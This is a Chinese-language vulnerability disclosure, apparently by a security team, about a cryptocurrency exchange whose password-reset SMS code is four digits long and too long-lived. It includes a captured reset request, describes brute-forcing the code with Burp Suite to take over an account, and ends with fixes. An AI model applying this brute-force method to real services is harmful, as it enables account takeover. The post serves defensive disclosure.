日前，知名区块链安全团队BYSEC发现一交易所的逻辑漏洞。据分析，黑客可以通过暴力破解并且修改账户密码。

旨在保证交易所的资金安全，督促其及时修复漏洞，BYSEC将披露此漏洞以及黑客的攻击手法，并提供安全建议，望各大交易所防患于未然。

一：登陆账号（以自己账号为例），并找回验证码

在找回密码的地方，同样由于验证码只有四位，且有效期并不是短信所说的五分钟，可对验证码进行暴力破解。

找回密码的地方发送验证码后抓包

POST /index.php/index/login/findpwd.html HTTP/1.1

Host: www.xxx.com

Content-Length: 119

Accept: */*

Origin: http://www.xxx.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://www.xx/index.php/index/login/findpwd.html

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: UM_distinctid=163c8a60f6159c-0b4bd043eec36-5e183017-13c680-163c8a60f626f9; parent_qimo_sid_e9218490-6333-11e8-a3c9-b1478a226697=35fdda40-67c4-11e8-83e4-79a21b6dfa62; accessId=e9218490-6333-11e8-a3c9-b1478a226697; pageViewNum=47; UM_distinctid=163c995bcfe252-0d945e09fb268f-5e183017-13c680-163c995bcff46f; bad_ide9218490-6333-11e8-a3c9-b1478a226697=ee01da81-679f-11e8-823a-23b1a05aa1d6; PHPSESSID=l1qlol0kf3fnja716emjaotf90; CNZZDATA1273849067=1079089793-1528075768-|1528101117; names=4015pF5qhMZgbLFCCuwQtNG2VYYlyMnhmmNUSRlT9HIhwDyDUD1rxxryXPM1

Connection: close

userType=1&userName=1381&countryCode=+86&smsCode=4314&imgCode=gkc&newPassword=123456qwe&newPasswords=123456qwe

这里用自己的账号进行测试，针对四位验证码smsCode进行爆破

成功爆破出四位验证码然后重置密码

二：使用Burp Suite工具成功爆破出四位验证码，重置密码为123456qwe (重置前密码是123456ttt)

三、和手机收到的验证码一致

四、利用重置的密码成功登录账户

对此，BYSEC对广大交易所提出安全建议：

1、添加验证码机制，加入图片（验证码动态生成且满足随机性）或者短信验证码（验证码具备超时时限一般为1分钟，且在该时限内错误次数超过3次则进行锁定1分钟后方能重新获取验证码，超时后验证码自动失效）！

2、验证码必须在服务器端进行校验，客户端的一切校验都是不安全的！